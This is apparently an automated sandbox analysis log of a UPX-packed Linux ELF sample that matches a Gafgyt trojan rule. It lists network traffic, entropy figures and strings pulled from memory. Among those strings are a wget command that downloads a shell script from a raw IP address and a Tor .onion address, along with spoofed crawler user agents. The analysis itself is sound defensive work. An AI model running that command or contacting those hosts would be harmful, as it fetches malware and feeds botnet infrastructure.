Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\truex |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: disable\\disable\\true\\3\\90\\true\\100|100000\\true\\wget http://185.196.10.215:12234/hi.sh\\ypohwtgf2675muzlafm6zajxd76cirfhe75htwrvadjpf3bm7erri4id.onion\\80\\true@s |
Source: global traffic |
TCP traffic: 192.168.2.23:37932 -> 198.50.207.21:1024 |
Source: /tmp/x86_64.bin.elf (PID: 6258) |
Socket: 127.0.0.1:4628 |
Jump to behavior |
Source: /tmp/x86_64.bin.elf (PID: 6264) |
Socket: 127.0.0.1:23 |
Jump to behavior |
Source: /tmp/x86_64.bin.elf (PID: 6264) |
Socket: 0.0.0.0:0 |
Jump to behavior |
Source: /tmp/x86_64.bin.elf (PID: 6264) |
Socket: 127.0.0.1:80 |
Jump to behavior |
Source: global traffic |
TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: global traffic |
TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 198.50.207.21 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 198.50.207.21 |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://185.196.10.215:12234/hi.sh |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/) |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)Mozilla/5.0 |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp) |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)Mozilla/5.0 |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://http://uhttp://uphttp://upxhttp://upx.http://upx.shttp://upx.sfhttp://upx.sf.nethttp://upx.sf |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://upx.sf |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://upx.sf. |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://upx.sf.n |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://upx.sf.neU |
Source: x86_64.bin.elf |
String found in binary or memory: http://upx.sf.net |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://upx.sf.nethttp://upx.sf.netCONFIG: |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://www.google.com/bot.html) |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0 |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://www.googlebot.com/bot.html) |
Source: x86_64.bin.elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp |
String found in binary or memory: http://www.googlebot.com/bot.html)Mozilla/4.0 |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown |
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTR |
Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown |
Source: LOAD without section mappings |
Program segment: 0x400000 |
Source: 6258.1.000000c000000000.000000c000800000.rw-.sdmp, type: MEMORY |
Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16 |
Source: Process Memory Space: x86_64.bin.elf PID: 6258, type: MEMORYSTR |
Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16 |
Source: classification engine |
Classification label: mal56.evad.linELF@0/0@0/0 |
Source: initial sample |
String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $ |
Source: initial sample |
String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $ |
Source: initial sample |
String containing UPX found: $Id: UPX 4.02 Copyright (C) 1996-2023 the UPX Team. All Rights Reserved. $ |
Source: x86_64.bin.elf |
Submission file: segment LOAD with 7.8235 entropy (max. 8.0) |
Source: x86_64.bin.elf |
Submission file: segment LOAD with 7.9999 entropy (max. 8.0) |
Source: x86_64.bin.elf |
Binary or memory string: vmCio |